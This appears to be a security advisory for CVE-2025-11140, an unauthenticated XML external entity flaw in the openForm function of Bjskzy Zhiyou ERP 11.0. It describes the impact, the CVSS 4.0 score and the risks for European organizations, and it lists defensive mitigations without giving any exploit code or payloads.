CVE-2025-11140 is a vulnerability identified in the Bjskzy Zhiyou ERP system, specifically affecting version 11.0. The flaw resides in the openForm function of the component com.artery.richclient.RichClientService. This vulnerability is an XML External Entity (XXE) reference issue, which occurs when the argument contentString is manipulated to include malicious XML entities. XXE vulnerabilities allow attackers to interfere with the processing of XML data, potentially leading to exposure of internal files, server-side request forgery (SSRF), denial of service (DoS), or other impacts depending on the XML parser's configuration. The vulnerability can be exploited remotely without requiring authentication or user interaction, increasing its risk profile. The vendor was contacted early but did not respond or provide a patch, and while an exploit is publicly available, there are no confirmed reports of exploitation in the wild. The CVSS 4.0 base score is 6.9, categorized as medium severity, reflecting the network attack vector, low complexity, no privileges or user interaction needed, and limited impact on confidentiality, integrity, and availability. The vulnerability does not affect the system configuration or require special attack conditions, making it accessible to a wide range of attackers. Given the ERP system's role in managing critical business processes, exploitation could lead to unauthorized data disclosure or disruption of operations.

For European organizations using Bjskzy Zhiyou ERP version 11.0, this vulnerability poses a significant risk to the confidentiality and integrity of sensitive business data. ERP systems typically handle financial, operational, and personnel information, so an XXE attack could expose confidential documents or enable further network penetration via SSRF. The remote, unauthenticated nature of the exploit increases the likelihood of attack attempts, especially in environments where the ERP system is exposed to the internet or insufficiently segmented. Disruption or data leakage could lead to regulatory non-compliance under GDPR, financial losses, reputational damage, and operational downtime. The lack of vendor response and patch availability exacerbates the risk, as organizations must rely on mitigations or workarounds. The medium severity rating suggests that while the vulnerability is serious, it may not lead to full system compromise without additional factors. However, the strategic importance of ERP systems in European enterprises means even limited exploitation could have outsized consequences.

Given the absence of an official patch, European organizations should implement the following specific mitigations: 1) Restrict network exposure of the Bjskzy Zhiyou ERP system by placing it behind firewalls and limiting access to trusted internal networks only. 2) Employ web application firewalls (WAFs) with rules designed to detect and block XML external entity payloads and suspicious XML content patterns. 3) Disable or restrict XML external entity processing in the ERP system’s XML parser configuration if possible, or use XML parsers that are hardened against XXE attacks. 4) Monitor logs for unusual XML requests or errors indicative of XXE exploitation attempts. 5) Conduct regular security assessments and penetration testing focused on XML input handling. 6) Prepare incident response plans for potential data breaches or service disruptions related to this vulnerability. 7) Engage with the vendor for updates and consider alternative ERP solutions if remediation is not forthcoming. 8) Isolate the ERP system from other critical infrastructure to limit lateral movement in case of compromise.